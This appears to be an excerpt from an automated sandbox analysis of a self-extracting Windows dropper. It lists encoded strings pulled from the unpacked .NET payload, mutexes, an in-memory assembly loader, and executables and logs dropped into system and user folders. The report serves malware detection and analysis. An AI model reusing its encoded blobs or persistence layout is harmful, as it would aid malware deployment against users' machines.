Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.cs	Base64 encoded string: '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
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 8B6.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 76n.cs	Base64 encoded string: 'UVtEeSHUk4yu9KPxdwSBr+sSkjGQFay1++KROxhl0u6A4n6QgKK9owCeJt4/ibRTaf4E5m/SCzpsURAMEr5Xg3qngaD25tEDnlwMC28qHpOjjYZZ3ftJybEZu9RT7fycp80B+C1+JH+0A7jyMX5ephjAjCm0aInhrTOAyfr2JSpnTXQoEphTKT9lyNJy7CA3kEbeH3HL9tf5TAJ1jraZfyFRNee9l9rkyXMwZL6Yyla2N9LSaYuIx5ETZrU5ZIeG'
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 7YK.cs	Base64 encoded string: 'uuzZiJXU5s98btEVomQruuLVWIdl8LsBzbXXAtrjRn45ZPAhuiYQKqWAjeDZqvVtA8J9WrV44qaGzP5GH50axc0IEXxfqS3fSL5bGALCNdVdQQKUi6Ru446iHA483zOm'
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 52Z.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\24ce2d5742570a51f4be0130d49d0ec60b8bba1c26d1231a555ddb981a05477d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Command line argument: sfxname	0_2_0089DF1E
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Command line argument: sfxstime	0_2_0089DF1E
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Command line argument: STARTDLG	0_2_0089DF1E

Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe			Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2			Jump to behavior

Source: o9jDrpZrgR.exe

Static file information: File size 1622827 > 1048576

Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: o9jDrpZrgR.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: o9jDrpZrgR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: o9jDrpZrgR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: o9jDrpZrgR.exe

Source: o9jDrpZrgR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: o9jDrpZrgR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: o9jDrpZrgR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: o9jDrpZrgR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: o9jDrpZrgR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 1a2.cs	.Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 857.cs	.Net Code: _736
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 1a2.cs	.Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 857.cs	.Net Code: _736

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089F640 push ecx; ret	0_2_0089F653
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089EB78 push eax; ret	0_2_0089EB96
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F43CB9 push ebx; retf	5_2_00007FF848F43CBA
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F5739D push ebp; retf	5_2_00007FF848F573A8
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F57BAC push eax; ret	5_2_00007FF848F57BAD
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F400BD pushad ; iretd	5_2_00007FF848F400C1
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F4739E push ebp; retf	12_2_00007FF848F473A8
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F47BAC push eax; ret	12_2_00007FF848F47BAD
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F300BD pushad ; iretd	12_2_00007FF848F300C1

Source: o9jDrpZrgR.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

File created: C:\reviewruntimeMonitor\__tmp_rar_sfx_access_check_7071296

Jump to behavior

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\ESwXjeKp.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\lGVRPIpa.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\SoilvDeL.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\BhRGcQzx.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\qtmQsFEO.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\hLTAIczh.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\QJNvoZJT.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\GVjFENOl.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\eQQkRcVr.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\HJnNqbKj.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\pwLIWFpU.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\fNssmckm.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\NBQmTGPX.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\vnjhvXId.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\egSCbkdO.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\MTqwIPIz.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\BfMGYDNR.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\sCEQoKxk.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\jTkAEhsC.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\eOLjNPjM.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\KWPomPtF.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\BnwYCmoX.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\zdaXCUIW.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\gRySjyoH.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\XieCzWia.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\GbOXfjDL.log	Jump to dropped file

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\eQQkRcVr.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\SoilvDeL.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\BhRGcQzx.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\gRySjyoH.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\BfMGYDNR.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\vnjhvXId.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\ESwXjeKp.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\XieCzWia.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\GbOXfjDL.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\egSCbkdO.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\hLTAIczh.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\jTkAEhsC.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\sCEQoKxk.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\MTqwIPIz.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\KWPomPtF.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\pwLIWFpU.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\NBQmTGPX.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\qtmQsFEO.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\fNssmckm.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\lGVRPIpa.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\zdaXCUIW.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\BnwYCmoX.log	Jump to dropped file
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	File created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\GVjFENOl.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\QJNvoZJT.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Users\user\Desktop\HJnNqbKj.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File created: C:\Recovery\qBJICEqiLNwXNBLrN.exe	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File created: C:\Users\user\Desktop\eOLjNPjM.log	Jump to dropped file

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
